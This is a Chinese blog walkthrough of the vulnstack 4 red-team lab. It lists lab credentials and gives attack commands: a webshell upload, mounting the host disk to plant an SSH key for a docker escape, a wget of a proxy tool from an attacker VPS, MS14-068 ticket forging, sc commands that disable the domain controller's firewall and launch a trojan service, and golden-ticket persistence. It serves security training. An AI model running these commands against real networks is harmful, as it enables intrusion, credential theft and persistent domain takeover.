vulstack红队评估(四)

最新推荐文章于 2023-10-07 16:53:06 发布
最新推荐文章于 2023-10-07 16:53:06 发布
阅读量1.6k 收藏 4
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45447309/article/details/106884910
版权

原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118210.html

 

一、环境搭建:

①根据作者公开的靶机信息整理

虚拟机密码:

ubuntu:

ubuntu:ubuntu

 

win7:

douser:Dotest123

 

Win2008 DC:

administrator:Test2008,因为登陆要修改密码,所以改为了panda666...

 

②虚拟机网卡设置

ubuntu双网卡模拟内外网:

外网:192.168.1.128,桥接模式与物理机相通

内网:192.168.183.128,仅主机模式

 

系统的网卡设置手动改一下:

 

win7只有内网:

内网:192.168.183.129,仅主机模式

 

win2008只有内网:

内网:192.168.183.130,仅主机模式

 

 

启动Web服务,都是利用docker启动(注意:先切换到root用户再启动,或者加sudo):

①cve-2018-12613(phpmyadmin文件包含漏洞):

 

②S2-045:

 

③CVE-2017-12615(tomcat put上传):



二、Web层渗透:

1、信息收集:

①端口和服务信息

nmap -T4 -sV 192.168.1.128

 

②端口具体服务

2001:St2

2002:Tomcat

2003:phpmyadmin

 

2、利用漏洞getshell

①St2-045

 

②Tomcat put上传

直接上传冰蝎马

 

③phpmyadmin文件包含漏洞

不做具体操作了,具体利用方式之前也已经实战过...这里不再阐述

 

利用冰蝎连接即可

 

 

3、Docker逃逸:

由于web环境是利用docker搭建的,所以还需要逃逸,才能拿到宿主机权限

①反弹一个标准终端过来:

.sh的内容是bash一句话反弹

 

nc监听,即可收到shell

 

②尝试利用CVE-2019-5736进行docker逃逸(失败告终)

1.将脚本中的payload修改为反弹shell命令:

 

2.然后利用go build进行编译:

 

3.将main文件上传到目标并赋予权限

 

4.执行main文件,然后受害机再次启动容器就会收到shell,但是这里我利用失败了...成功的话如下图:

 

卡壳:在这里尝试了很多次,都无法执行成功,耗费了大量时间,然后看到作者给出提示是ssh私钥利用,然后现学一下,就有了下面的操作:

 

③利用ssh私钥:

1.挂载文件

mkdir /panda
mount /dev/sda1 /panda
ls /panda/

 

2.kali本地生成ssh私钥:

mkdir key
cd key/
ssh-keygen -f panda
chmod 600 panda

 

3.写入私钥:

cp -avx /panda/home/ubuntu/.ssh/id_rsa.pub /panda/home/ubuntu/.ssh/authorized_keys    # -avx是将权限也一起复制
echo > /panda/home/ubuntu/.ssh/authorized_keys
echo '生成的.pub文件的值' > /panda/home/ubuntu/.ssh/authorized_keys

 

查看是否成功生成:

ls /panda/home/ubuntu/.ssh/

 

4.然后利用自己的私钥进行登陆:

ssh -i panda ubuntu@192.168.1.128

 

5.利用此主机作为跳板,进行横向,利用ew搭建socks代理:

wget http://vps的ip/ew_for_linux64

 

开启正向socks代理:

chmod +x ew_for_linux64
./ew_for_linux64 -s ssocksd -l 1080

 

proxychains添加代理规则:

 

三、内网渗透:

1、内网信息收集:

利用ubuntu执行ifconfig,发现有两个网卡:

 

生成elf木马,让linux主机上线:

 

添加路由进行横向:

 

使用ms17-010扫描一下网段:

 

再一次卡壳:发现130和129都存在,但是始终无法获取会话,利用不成功....也不是知道是什么原因,但是目前只能想到用系统漏洞拿shell再进行横向了....思前想后,怀疑是msf路由的问题,就利用msf自带的设置代理参数设置socks5代理:

setg Proxies socks5:192.168.1.128:1080

 

然后就打成功了...这个具体什么原因呢?还不清楚...

 

2、域内信息收集:

①常规信息收集:

先把权限降为域用户,方便进行信息收集

 

网卡信息:

 

域内机器:

 

域控列表:

 

域管列表:

 

域内用户:

 

 

3、横向移动:

1.利用ms14-068攻击域控:

①获取域用户sid:

 

查看bash历史记录时,发现了域用户的账号密码:douser\Dotest123

 

②伪造生成票据:

ms14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130

 

③导入票据:

kerberos::purge
kerberos::ptc 票据名

 

④访问域控:

 

2.利用sc上线域控:

①关闭域控防火墙

sc \\WIN-ENS2VR5TR3N create closewall binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-ENS2VR5TR3N start closewall

 

②msf生成bind木马:

 

回退权限,并上传到目标机器:

 

然后利用copy命令上传到域控:

 

③创建执行木马的服务:

sc \\WIN-ENS2VR5TR3N create ma binpath= "c:\ma.exe"
sc \\WIN-ENS2VR5TR3N start ma

 

执行完成域控就上线了,最好马上迁移进程:

 

直接dump所有hash:

 

4、权限维持:

load kiwi
kerberos_ticket_purge
golden_ticket_create -d demo.com -k 7c4ed692473d4b4344c3ba01c5e6cb63 -s S-1-5-21-979886063-1111900045-1414766810 -u Administrator -t /tmp/krbtgt.ticket    # 注意这里的sid没有后面的-xxxx
kerberos_ticket_use /tmp/krbtgt.ticket

 

可以在不更改krbtgt密码的情况下维持一段时间的权限了:

 

四、总结:

①踩了太多坑了...msf添加路由无法获取shell,使用msf自带的设置socks代理参数才成功

②如何通过一台跳板搭建socks代理,一步步拿下域控

③ms17-010拿下某域机器权限,随后利用ms14-608获取域控权限

④sc执行命令+bind直连方式上线域控

⑤黄金令牌的伪造以及权限维持

m0s30
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
攻防手册,攻防教程
04-20
攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御...事件分析和报告:经过一段时间的攻防活动后,和蓝共同进行事件分析和总结,评估组织的安全性,提供详细的报告和建
内网渗透之Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1252
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
vulnstack4渗透-外网篇
weixin_51441054的博客
04-20 3015
环境搭建 靶机:ubuntu:ubuntu(web服务器 网卡1:192.168.142.139(模拟外网) 网卡2:192.168.183.130(内网)) 域成员机器:douser:Dotest123(192.168.183.128)win7 DC:administrator:admin123,.(192.168.183.130)windowsserver2008 kali攻击机:192.168.142.134(模拟外网) 先对web靶机进行信息收集 发现一个ssh服...
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1719
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
日靶机vulnstack04【半总结】
qq_45300786的博客
10-06 482
这次环境是3台机器, web服务器:000000 、DC:000000ydc. 、 win7 web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。 所以我就进入高级模式下,修改了root用户的密码 关于虚拟机没有ipIP解决方案 然后再切到root用户修改ip win7 这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码 这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个sy
靶场vulnstack4内网渗透
weixin_71169068的博客
11-18 1005
靶场vulnstack4内网渗透
渗透打点工具-FindUpload
最新发布
03-07
FindUpload是一款打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
GOBY 版 GOBY205REDTEAM-1288-POCS-by-hlop-orz-zen
11-16
GOBY 版 GOBY205REDTEAM_1288_POCS-by_hlop_orz_zen
虚拟机Ninjutsu.V3最新版8月26更新
11-13
虚拟机Ninjutsu.V3最新版8月26更新 Ninjutsutorrent-master,一款综合各种工具的渗透平台,通过强大的调整功能和优化来定制 Windows 10; 2020年11月8日更新V3版, win10专业版2004[19041.450]
测试指南RedTeam Testing Guide.pdf
08-12
测试指南
ATT&CK实战系列—实战-4
Beret-81的博客
04-27 1408
0、靶场介绍 靶场下载、配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 靶场配置后需要自行开启 vulhub 里面的三个漏洞。 1、信息收集 2、漏洞分析 该阶段为漏洞挖掘、漏洞扫描、漏洞验证 2.1 struts2 漏洞 struts2 漏洞检查工具: https://github.com/HatBoy/Struts2-Scan https://github.com/shack2/Struts2VulsTools https://git
vulnstack域环境靶场(四)
BROTHERYY的博客
12-09 1444
环境搭建 进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下: sudo su ubuntu docker-compose build docker-compose up 环境全部开启效果如下: 信息搜集 通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了 ...
日安全ATT&CK靶机实战系列之vulnstack4
黑白的博客
04-25 6910
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的网卡
Vulnstack内网靶场4
weixin_48888525的博客
11-07 2654
环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器  攻击机kali地址:192.168.157.129  悬剑:192.168.157.130 还需要进入ubuntu开启服务,密码ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045vsudo docker-compose up -d cd
日靶场】vulnstack3-完整渗透过程
信安是不可或缺的一部分!
10-07 423
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD。现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了。脏牛:https://github.com/Rvn0xsy/linux_dirty。还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。
[渗透测试]Vulnstack (四)
cosmoslin的博客
04-03 503
环境配置 网络拓扑图(仅供参考) 账号信息: web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 ip信息: 攻击机 IP:192.168.111.5 OS:Kali 靶机 Web IP1:192.168.111.14 IP2:192.168.52.129 OS:Ubuntu DC IP:192.168.183.0/24 OS:Windows Server 2008 PC
日安全vulnstack-ATT&CK实战系列 实战(四)
遇事不决冲冲冲
03-29 8138
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 二.环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹中创建
检测和渗透测试的区别
山兔的博客
10-13 710
一个企业被攻破一定是因为存在安全漏洞或者配置错误之类的安全问题,这是不正确的。如果真这么简单,那只要按时打补丁,就能防住所有没有0day的恶意黑客甚至防住APT攻击了。上文已经说过,测试过程中不一定会发现安全漏洞,很多时候不需要安全漏洞就能打穿一个企业。而现今的安全市场,很多企业还是以漏洞数量来评定安全服务团的能力,就导出现了很多安全服务报告硬凑漏洞数量的怪象。在这种大环境下,企业可能反而认为没有发现安全漏洞但打穿了他们的安全能力不行,或者认为纯粹是偶然侥幸才能得手。
Vulnstack(四)
干铮的博客
05-24 1006
靶场拓扑 下载连接:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 用的是VMware workstation 所以可能出现一些错误 Docker环境启动的是Vulhub的在线三个靶机 1.信息收集 主机发现 sudo netdiscover -i eth1 -r 192.168.157.0/24 端口扫描 nmap -A 192.168.53.128 -p- -oN nmap.a 2.apacheput文件上传脚本..
ATT\\\\&CK评估实战靶场四
08-16
ATT&CK评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK评估日靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值